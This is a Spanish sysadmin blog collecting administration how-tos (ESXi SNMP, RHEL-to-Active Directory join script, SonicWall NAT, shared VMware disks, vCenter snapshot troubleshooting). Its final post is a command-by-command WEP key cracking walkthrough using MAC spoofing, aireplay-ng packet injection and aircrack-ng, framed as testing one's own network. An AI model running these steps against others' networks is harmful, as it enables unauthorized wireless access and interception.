VIDANEZ SITE

Añadir SNMP a VmWare ESXi 4.X o 5.X

Juan José Vidañez — Mon, 25 Mar 2013 20:24:33 +0000

Desde Vcenter tenemos la opción de usar el protocolo SNMP en modo push, y podemos llegar a configurar hasta 4 receptores. Para configurarlo accedemos a "Administration>Vcenter Server Settings>SNMP"

Si fuera necesario a través de líneas de código en power shell podríamos añadir incluso alguno mas.

Pero también nos puede interesar que nuestros Hosts ESXi sean capaces de ser preguntados usando protocolo SNMP en modo polling desde alguna aplicación que sea capaz de consumir SNMP. Debemos hacerlo modificación el siguiente fichero:

# vi /etc/vmware/snmp.xml

trueTU_COMUNIDAD_SNMP

# services.sh restart

Un par de consejos, pon el Server en "maintenance" ya que perderás acceso durante unos segundo y si tienes configurado el HA te puede saltar. Y en el nombre de la comunidad usa cualquier cosa que no sea "public" o "default" como medida de seguridad.

Las MIB no te sera difícil encontrarlas, aquí te dejo algún link:

https://my.vmware.com/web/vmware/details?downloadGroup=ESX40-SNMP-MIB-DT&productId=230

https://my.vmware.com/web/vmware/details?downloadGroup=SNMP_MIBS&productId=229

https://my.vmware.com/web/vmware/details?downloadGroup=VSP510-SNMPMIBS-510&productId=285

Puedes buscarlas en la página de "Download" de VmWare

Validar y autenticar Red Hat 6 (RHEL 6) con Active Directory 2003

Juan José Vidañez — Mon, 09 Jul 2012 12:06:26 +0000

Últimamente me he encontrado en una situación curiosa al tener que validar contra un AD 2003 y posterior mente soportar la migración al AD 2008 R2. Después de un poco de investigación y tiempo he encontrado un par de opciones viables.

Requisitos previos:

1. NTP. Nuestro servidor de NTP debe ser el mismo que el de los Domain Controllers de Windows a los que nos vamos a conectar.

2. FQDN. El comando "hostname -f" debe devolvernos el mismo dominio que el controlado por los Domain Controllers, en otras palabras deben usar sus mismos DNS, si son internos al dominio, algo bastante común, pues debe darse de alta en el.

3. GROUPS. No podemos tener el mismo nombre en los grupos de Windows y los grupos Unix. Bueno si podemos pero tenemos que tener claro que si coinciden en nombre prevalecerán los permisos de Unix. Quiere decir que si el usuario no existe en el grupo de Unix que se llama igual que el de Windows, dará igual que este en el Windows o no.

4. MAYÚSCULAS. El script que presento tiene mayúsculas y minúsculas, poned vuestros datos con el mismo orden. Kerberos es "case sesitive" y no funcionara si no lo respetáis.

5. SYSADMINX. Con este script solo permitimos a los que pertenecen al grupo "sysadminx" entrar al sistema. Esta como requisito en la configuración de pam. Esto puede ser cambiado por cualquier grupo de nuestra elección o simplemente eliminar la línea para permitir a cualquiera acceder.

Script:

#!/bin/bash

#————————————————————+

# Purpose :Script for connect to Active Directory 2003

# Shell :Bash

# OS :RHEL 6

# Version :1.0

# Revision :0

# Author :JJ Vidanez

#————————————————————+

WORKGR=EXAMPLE

DOMAIN=EXAMPLE.LOCAL

KRBREALM=EXAMPLE.LOCAL

DC1=dc1.example.local

DC2=dc2.example.local

[[ -n "$1" ]] || { echo "Parameter AD admin account needed"; exit 0 ; }

echo "[*] Installing required authentication packages"

for package in samba-common pam_krb5 sudo authconfig samba-winbind samba-winbind-clients krb5-libs krb5-workstation

rpm -q ${package} >/dev/null 2>&1

if [[ $? -ne 0 ]]

then

echo "… installing ${package}"

yum -y install ${package} >/dev/null 2>&1

if [[ $? -ne 0 ]]

then

echo "${package} installation failed"

exit 1

done

echo "[*] Configuring Kerberos, samba and winbind"

authconfig \

–disablecache \

–disablesssd \

–disablesssdauth \

–disableldapauth \

–disableldap \

–disablefingerprintauth \

–disablefingerprint \

–enablewinbind \

–enablewinbindauth \

–smbsecurity=ads \

–smbworkgroup=${WORKGR} \

–smbrealm=${DOMAIN} \

–enablewinbindusedefaultdomain \

–winbindtemplatehomedir=/export/home/%U \

–winbindtemplateshell=/bin/bash \

–enablekrb5 –krb5realm=${KRBREALM} \

–enablekrb5kdcdns \

–enablekrb5realmdns \

–enablelocauthorize \

–enablemkhomedir \

–enablepamaccess \

–updateall

echo "[*] Saving originals krb5.conf and smb.conf"

mv /etc/samba/smb.conf /etc/samba/smb.conf.orig

mv /etc/krb5.conf /etc/krb5.conf.orig

echo "[*] Introducing new /etc/krb5.conf"

cat < /etc/krb5.conf

[logging]

default = FILE:/var/log/krb5libs.log

kdc = FILE:/var/log/krb5kdc.log

admin_server = FILE:/var/log/kadmind.log

[libdefaults]

default_realm = EXAMPLE.LOCAL

dns_lookup_realm = true

dns_lookup_kdc = false

ticket_lifetime = 24h

renew_lifetime = 7d

forwardable = true

[realms]

EXAMPLE.LOCAL = {

kdc = dc1.example.local

kdc = dc2.example.local

admin_server = dc1.example.local

admin_server = dc2.example.local

}

[domain_realm]

example.local = EXAMPLE.LOCAL

.example.local = EXAMPLE.LOCAL

[kdc]

profile = /var/kerberos/krb5kdc/kdc.conf

[appdefaults]

pam = {

debug = false

ticket_lifetime = 36000

renew_lifetime = 36000

forwardable = true

krb4_convert = false

}

EOF

echo "[*] Introducing new /etc/samba/smb.conf"

cat < /etc/samba/smb.conf

[global]

workgroup = EXAMPLE

realm = EXAMPLE.LOCAL

security = ads

idmap uid = 16777216-33554431

idmap gid = 16777216-33554431

winbind separator = +

template homedir = /export/home/%U

template shell = /bin/bash

winbind use default domain = true

winbind offline logon = false

server signing = auto

server string = Samba Server

winbind enum users = yes

winbind enum groups = yes

idmap config EXAMPLE:backend = rid

idmap config EXAMPLE:base_rid = 500

idmap config EXAMPLE:range = 90000-1000000

[homes]

comment = AD User Home Directories

browseable = no

writable = yes

valid users = %D+%S

EOF

echo "[*] Modifying SSHD to support PAM authentication"

grep -e '^UsePAM.*' /etc/ssh/sshd_config >/dev/null 2>&1

if [[ $? -ne 0 ]]

then

cat << EOF >> /etc/ssh/sshd_config

UsePAM yes

EOF

else

perl -pi -e 's|^UsePAM.*|UsePAM yes|' /etc/ssh/sshd_config

echo "[*] Modifying pam for mkhomedir arguments and winbind"

mv /etc/pam.d/password-auth /etc/pam.d/password-auth.orig

mv /etc/pam.d/system-auth /etc/pam.d/system-auth.orig

cat < /etc/pam.d/password-auth

#%PAM-1.0

# This file is auto-generated.

# User changes will be destroyed the next time authconfig is run.

auth required pam_env.so

auth sufficient pam_unix.so nullok try_first_pass

auth requisite pam_succeed_if.so user ingroup sysadminx debug

auth requisite pam_succeed_if.so uid >= 500 quiet

auth sufficient pam_krb5.so use_first_pass

auth sufficient pam_winbind.so use_first_pass

auth required pam_deny.so

account required pam_access.so

account required pam_unix.so broken_shadow

account sufficient pam_localuser.so

account sufficient pam_succeed_if.so uid < 500 quiet

account [default=bad success=ok user_unknown=ignore] pam_krb5.so

account [default=bad success=ok user_unknown=ignore] pam_winbind.so

account required pam_permit.so

password requisite pam_cracklib.so try_first_pass retry=3 type=

password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok

password sufficient pam_krb5.so use_authtok

password sufficient pam_winbind.so use_authtok

password required pam_deny.so

session optional pam_keyinit.so revoke

session required pam_limits.so

session optional pam_mkhomedir.so umask=0077

session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid

session required pam_unix.so

session optional pam_krb5.so

EOF

cp -p /etc/pam.d/password-auth /etc/pam.d/system-auth

echo "[] Join to the domain"

net ads join -U $1

echo "[*] Restarting services"

service winbind restart

##############################################################################

### Vidanez.com is not responsible for the

### contents, use or the code enclosed.

###

### Use of this software is under your own responsability

### http://www.vidanez.com/responsabilidad-del-contenido/

##############################################################################

LINK to the script AD2003

Por ultimo en caso de que no os funcione os recomiendo que le echéis un vistazo a los logs de kerberos y de "/var/logs/secure" que os dirá exactamente donde esta el fallo.

Sun Fire V890 y demás máquinas antiguas. Hot-plug SCSI Device

Juan José Vidañez — Thu, 29 Sep 2011 10:51:42 +0000

Me he encontrado con una máquina muy antigua una Sun Fire V890, y con unos discos que tenia que sacar.

Esta máquina usa "Dynamic Reconfiguration" o DR por lo tanto sus discos se pueden poner en "Ready to remove" y encienden su led para ese cometido.

Dada la antigüedad de estos sistemas, no utilizan el comando que cualquiera supondria "cfgadm" si no que aun usan el "luxadm" como con los antiguos PHOTON o Sun A5200.

Os dejo con el ejemplo:

root@example / # luxadm remove_device -F /dev/rdsk/c1t4d0s0

WARNING!!! Please ensure that no filesystems are mounted on these device(s).

All data on these devices should have been backed up.

The list of devices which will be removed is:

1: Box Name: "FCloop" slot 4

Node WWN: 500000e010394d30

Device Type:Disk device

Device Paths:

/dev/rdsk/c1t4d0s2

Please verify the above list of devices and

then enter 'c' or to Continue or 'q' to Quit. [Default: c]:

stopping: Drive in "FCloop" slot 4….Done

offlining: Drive in "FCloop" slot 4….Done

Hit after removing the device(s).

Drive in Box Name "FCloop" slot 4

Notice: Device has not been removed from the enclosure.

It has been removed from the loop and is ready to be

removed from the enclosure, and the LED is blinking.

Logical Nodes being removed under /dev/dsk/ and /dev/rdsk:

c1t4d0s0

c1t4d0s1

c1t4d0s2

c1t4d0s3

c1t4d0s4

c1t4d0s5

c1t4d0s6

c1t4d0s7

root@example / # luxadm remove_device -F /dev/rdsk/c1t5d0s0

WARNING!!! Please ensure that no filesystems are mounted on these device(s).

All data on these devices should have been backed up.

The list of devices which will be removed is:

1: Box Name: "FCloop" slot 5

Node WWN: 500000e01039a200

Device Type:Disk device

Device Paths:

/dev/rdsk/c1t5d0s2

Please verify the above list of devices and

then enter 'c' or to Continue or 'q' to Quit. [Default: c]:

stopping: Drive in "FCloop" slot 5….Done

offlining: Drive in "FCloop" slot 5….Done

Hit after removing the device(s).

Drive in Box Name "FCloop" slot 5

Notice: Device has not been removed from the enclosure.

It has been removed from the loop and is ready to be

removed from the enclosure, and the LED is blinking.

Logical Nodes being removed under /dev/dsk/ and /dev/rdsk:

c1t5d0s0

c1t5d0s1

c1t5d0s2

c1t5d0s3

c1t5d0s4

c1t5d0s5

c1t5d0s6

c1t5d0s7

Crear reglas de NAT de salida SONICWALL

Juan José Vidañez — Mon, 23 May 2011 19:25:44 +0000

Me he encontrado con un entorno en el que para la salida del firewall a internet era necesario crear reglas de NAT.

El proveedor de servicios me ofrece un router con un direccionamiento local 192.168.254.1 y una mascara 255.255.255.252, por tanto mi WAN del Sonicwall era 192.168.254.2. Y me dan un rango de IPs publicas para usar saliendo en NAT.

Como ejemplo usaremos el rango 19.178.23.224/255.255.255.248 que lo llamaremos "segmentoWAN" y creamos un "Network Object" con el.

Despues dentro de Network–>ARP creamos tantas entradas como IP tengamos dentro del pool en la interfaz WAN (X1 en nuestro caso). En nuestro ejemplo creamos una 19.178.23.226 y establecemos que el sonicwall le asigne una IP automaticamente:

Esa IP WAN la usamos para crearnos un network object en nuestro ejemplo IPWAN1.

En el menu Network–>NAT policies creamos el NAT que nos permitira que todos nuestros usuarios detras del firewall salgan a internet usando como IP la IPWAN1

Al igual si queremos publicar un servidor de cualquier tipo, es aqui donde debemos crear la regla de NAT correspondiente, a parte de haber creado los demas pasos necesarios. Abrir firewall, preparar el servicio, etc

Por ultimo debemos de recordar que el sonicwall debe ser capaz de enrutar las comunicaciones con el rango WAN por tanto en la seccion Network–>Routing debemos crear una entrada del siguiente modo para "segmentoWAN"

Crear un disco compartido entre varias VM en ESX(i) 4.x

Juan José Vidañez — Tue, 18 Jan 2011 19:04:29 +0000

Para montar algún tipo de cluster en cualquier versión de OS, ya sea Unix, Linux o Microsoft, es necesario crear discos compartidos para datos y quórum. Sobre plataformas virtualizadas de vmware, es totalmente factible y sencillo.

Antes de todo, ya sea en ESX o ESXi, tenemos que habilitar el acceso por SSH, para poder lanzar comandos en la shell, ya que necesitaremos acceso a esta para la creación de los discos compartidos. O bien tambien podríamos usar el vMA.

Si lo intentamos por el entorno grafico obtendremos un error durante el encendido de las VM similar a

Una vez en el sistema os aconsejo crear una carpeta con los discos a compartir tipo SHARED_DISKS en el volumen donde queramos que residan. Normalmente en un entorno grande se tiene una de estas carpeta por cada datastore.

Nos situamos dentro de esta y lanzamos el siguiente comando:

vmkfstools -c -d eagerzeroedthick /vmfs/volumes//.vmdk

EJEMPLO:

vmkfstools -c 10Gb -d eagerzeroedthick -a lsilogic RAC_VOT2.vmdk

Con esto tendremos creado el o los discos en si pero no enganchados a ninguna máquina, además si usamos vMA tendremos que usar un parámetro más "–server". Es importante la opción "eagerzerothick" sin ella nos dará errores.

En cada VM tendremos que modificar el componente "SCSI Controller" o crear uno nuevo, siendo esto último mas aconsejable ya que no interferiremos con el funcionamiento actual del sistema. Esta deberá tener la opción "SCSI Bus Sharing" en virtual.

Y añadimos los discos seleccionando la opción discos existentes a esta "SCSI Controller", y eligiendo los discos que hemos creado anteriormente.

Esto lo repetimos por cada VM donde queramos que se vean dichos discos.

Otra opción que tenemos con el comando "vmkfstool" es la de convertir y modificar discos

vmkfstools -i .vmdk .vmdk -d

EJEMPLO:

vmkfstools -i RAC_DAT.vmdk RAC_DAT1.vmdk -d eagerzeroedthick

Mas información:

http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1028042

Comparte teclado y raton sin KVM “The Synergy Project”

Juan José Vidañez — Thu, 25 Nov 2010 23:07:59 +0000

Hace tiempo busque una solución de este tipo para poder usar varios sistemas simultáneamente y lo único que encontré fueron KVM. Me parece un proyecto interesante y ojalá lo evolucionen hasta la perfección.

http://synergy-foss.org/pm/projects/synergy/tabs/welcome

Welcome to The Synergy Project

What is Synergy?

Synergy is FOSS that lets you easily share a single mouse and keyboard between multiple computers with different operating systems, without special hardware. All you need is a LAN connection. It's intended for users with multiple computers, where each system uses its own display.

Major features

Move your mouse easily between computers
Requires nothing other than existing ethernet
Copy and paste between your computers
No need to press any buttons (unlike KVM)
You can still use multiple monitors on the same computer
Lock the mouse to one screen

Synergy is not a KVM or VNC tool, since it does not deal with video. The advantage over a KVM is that you don't need to press any buttons or pull any levers to change screens — your keyboard input just goes to the same screen that your mouse cursor is on. Still not sure? Read more.

Activando el TFTP nativo de Snow Leopard

Juan José Vidañez — Mon, 04 Oct 2010 19:03:32 +0000

Que OSX incluya un servidor de TFTP dentro de su software base es una ayuda genial cuando te encuentras ante un Router/Switch/FW/Cualquier bicho que desees actualizar y use TFTP.

Para comenzar lanzamos un terminal apra abrir el "launchd", y el comando

sudo launchctl

Con ello nos cambiara el promp a "launchd%":

load -F /System/Library/LaunchDaemons/tftp.plist

Ponemos lo que queremos compartir en la carpeta:

/private/tftpboot

Cuando deseemos dejar de usarlo, seguimos los pasos anteriores pero ejecutando:

unload /System/Library/LaunchDaemons/tftp.plist

Otra de las opciones es dejarlo lanzado en nuestro sistema de modo permanente o desactivarlo de ese modo permanente, esto nos lo permite la opción "-w" de los comandos "load/unload" en el "launchd".

Dia de los administradores de sistemas o sysadmins

Juan José Vidañez — Fri, 30 Jul 2010 11:04:12 +0000

Ya lo se que parece la fricada mas grande del mundo, pero si hoy es nuestro dia y deberian felicitarnos por nuestras horas pringando …..

Un abrazo pa toos

http://www.sysadminday.com/

Problemas de caídas continuas del servicio VirtualCenter Server

Juan José Vidañez — Mon, 12 Jul 2010 16:36:28 +0000

Tras una llamada de emergencia he asistido a un cliente que perdian la posibilidad de administracion de los nodos de ESX.

Problemas:

Su servicio de VCenter se caia cada 5 minutos sin una razón aparente. En concreto el sistema Windows 2003 daba el siguiente mensaje en el visor de sucesos:

Tipo de suceso: Información

Origen del suceso: VMware VirtualCenter Server

Categoría del suceso: Ninguno

Id. suceso: 1000

Fecha: 09/07/2010

Hora: 9:54:57

Usuario: No disponible

Equipo: *********

Descripción:

No se encuentra la descripción del Id. de suceso ( 1000 ) en el origen ( VMware VirtualCenter Server ). Es posible que el equipo local no tenga la información de Registro o archivos DLL de mensajes necesarios para mostrar mensajes desde un equipo remoto. Es posible que pueda usar el indicador /AUXSOURCE= para recuperar esta descripción; consulte Ayuda y soporte técnico para obtener más detalles. La siguiente información es parte del suceso: Log directory: C:\Documents and Settings\Default User\Configuración local\Datos de programa\VMware\vpx..

Tipo de suceso: InformaciónOrigen del suceso: VMware VirtualCenter ServerCategoría del suceso: NingunoId. suceso: 1000Fecha: 09/07/2010Hora: 9:54:57Usuario: No disponibleEquipo: *******Descripción:No se encuentra la descripción del Id. de suceso ( 1000 ) en el origen ( VMware VirtualCenter Server ). Es posible que el equipo local no tenga la información de Registro o archivos DLL de mensajes necesarios para mostrar mensajes desde un equipo remoto. Es posible que pueda usar el indicador /AUXSOURCE= para recuperar esta descripción; consulte Ayuda y soporte técnico para obtener más detalles. La siguiente información es parte del suceso: Log directory: C:\Documents and Settings\Default User\Configuración local\Datos de programa\VMware\vpx..

Ademas teníamos este otro:

Tipo de suceso: Error

Origen del suceso: Service Control Manager

Categoría del suceso: Ninguno

Id. suceso: 7031

Fecha: 09/07/2010

Hora: 10:34:47

Usuario: No disponible

Equipo: *********

Descripción:

El servicio VMware VirtualCenter Server terminó inesperadamente. Lo ha hecho 1 veces. Se realizará la siguiente acción correctora en 300000 milisegundos: Reiniciar el servicio.

Para obtener más información, vea el Centro de ayuda y soporte técnico en http://go.microsoft.com/fwlink/events.asp.

Tipo de suceso: ErrorOrigen del suceso: Service Control ManagerCategoría del suceso: NingunoId. suceso: 7031Fecha: 09/07/2010Hora: 10:34:47Usuario: No disponibleEquipo: **********Descripción:El servicio VMware VirtualCenter Server terminó inesperadamente. Lo ha hecho 1 veces. Se realizará la siguiente acción correctora en 300000 milisegundos: Reiniciar el servicio.
Para obtener más información, vea el Centro de ayuda y soporte técnico en http://go.microsoft.com/fwlink/events.asp.

Tras un rato navegando por distintos logs del sistema y de vmware encontre las siguientes lineas en el vxpd.log:

[2010-07-06 11:33:13.526 02016 error 'App'] Win32 exception: Stack overflow (0xc00000fd)

[2010-07-06 11:33:13.526 02016 error 'App'] eip: 0x19de1fb esp: 0x58a2fcc ebp: 0x58a3040

[2010-07-06 11:33:13.526 02016 error 'App'] eax: 0x58a5064 ebx: 00000000 ecx: 0x1302d48 edx: 0xfffffffe edi: 0x408de68 esi: 0×000007

La verdad que muchas pistas no daba el invento, ademas cayendo continuamente no me dejaba mirar nada dentro de sus sistemas.

Buscando en la base de incidencias de VmWare encontre un documento que me dio la pista para su resolucion:

http://kb.vmware.com/kb/1016281

En este documento encontre la pista definitiva, “A virtual machine has too many snapshots associated with it“

Resolución:

Entre en la administración de ambos nodos, de modo directo sin usar el Vcenter.

Y en uno de ellos encontre un sistema con 18 snapshots que era el causante del problema.

En el Snapshot Manager borre uno a uno esos 18 snapshot, y le di un reinicio al sistema del Vcenter Server, y conseguimos recuperar el servicio.

Buscar quien fue el causante de estos 18 Snapshot fue un poco mas complicado

Laboratorio: Prueba de concepto. Crackear claves WEP usando Backtrack

Juan José Vidañez — Wed, 24 Feb 2010 17:59:29 +0000

A continuación comparto una prueba de concepto para nuestras redes wifi de tipo WEP. En ningún caso aconsejo usar esto para una red Wifi que no sea de nuestra propiedad.

El CHIP de wireless es el INTEL PRO/Wireless 3945ABG Network

Nota: los comandos os los paso en forma de script para que podáis crear ejecutables con ellos, o sueltos y ejecutáis uno a uno

Comenzamos:
Tenemos que cambiar los drivers de la tarjeta ya que no soportan modo promiscuo. En el backtrack viene unos que nos interesan

Script: “ipw3945i.sh”

#!/bin/bash
echo “[*] Removing IPW3945 drivers”
rmmod ipwraw
rmmod iwl3945
rmmod mac80211
echo “[*] Inserting IPWRAW drivers (raw mode)”
modprobe ipwraw

Lanzamos :

iwconfig

Vemos cual es la tarjeta wifi, en mi caso es wifi0 continuo usandola como ejemplo.
Me cambio la MAC , este es un numero de cada “tarjeta del mundo”. Tambien podemos cambiarnos la MAC para imitar una que este conectada en la nuestra red.

ifconfig wifi0 down
macchanger –mac 00:10:20:30:40:50 wifi0
ifconfig wifi0 up
ifconfig wifi0

En este punto podemos usar “Backtrack->Wireless Tools -> Analyzers ->Kismet” para elegir la red a la que atacar, o usar los comandos:

airmon-ng start wifi0
airodump-ng wifi0

El software este se puede tambien ordenar como el kismet pero la verdad nunca lo he intentado, aconsejo un vistazo al man para ver que tal ….
Una vez elegida la red a la que atacar haces un “CRTL+C” en esa ventana para que pare. Apuntas el bssid (MAC), el essid (NOMBRE) y channel (CANAL).

En otra ventana de shell que abriremos y dejaremos lanzado el comando, para monitorizar esa red elegida para atacarla:

airodump-ng -c $CHANNEL -w $ESSID –bssid $BSSID wifi0

Rellenando los datos de los que hemos recogido antes ($). Si el essid tiene espacios lo pones entre comillas.

En otra venta de shell comenzamos el ataque en si.

Nos asociamos al AP, con el comando rellenado ($) el dato recopilado antes:

aireplay-ng -1 0 -a $BSSID -h 00:10:20:30:40:50 wifi0

Aqui es normalmente cuando puede fallar el invento ya que no le guste nuestra fakeMAC (00:10:20:30:40:50) al AP. Tendremos que cambiarla en caso necesario.

Ahora comenzamos a meterle paquetes rellenado los datos necesarios ($):

aireplay-ng -3 -b $BSSID -h 00:10:20:30:40:50 wifi0

Cabe la posiblidad de que de golpe nos dia algo asi como “notice: got a deauth/disassoc packet. Is the source MAC associated ?" Eso es simplemente que tenemos que volver a lanzar la asociacion en otra shell, porque el router o AP se ha percatado de nuestro ataque y nos ha dado la patadita.

Y si todo es correcto solo nos queda esperar a que los ARP nos vayan subiendo. Es necesario unos 100.000 o 200.000 dependiendo si la pass es de 64bits o 128bits. Esta es la parte de paciencia, si no estuvieramos metiendole paquetes con el aireplay tendriamos que esperar conexiones en la red.

Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets…(499 pps)

Una vez tenemos eso ya veremos que en el sistema tendremos unos ficheros del nombre de la essid con extension “.cap” en el directorio en el que estábamos.
Pues realizamos rellenado los datos ($):

aircrack-ng -n 64 –bssid $BSSID $ESSID.cap

Para crackear una pass 64bit. El resultado nos viene como grupos de 2 separados por “:” quetamos los “:” y el chorizo se lo podemos poner directamente al windows.

aircrack-ng -n 128 –bssid $BSSID $ESSID.cap

Para cargarnos una de 128bit, y el resultado seria el mismo que anteriormente.

El backtrack esta disponible en http://www.remote-exploit.org/

Espero que despues de esto puedas probar la seguridad de tu red y la importancia de usar protocolos más seguros.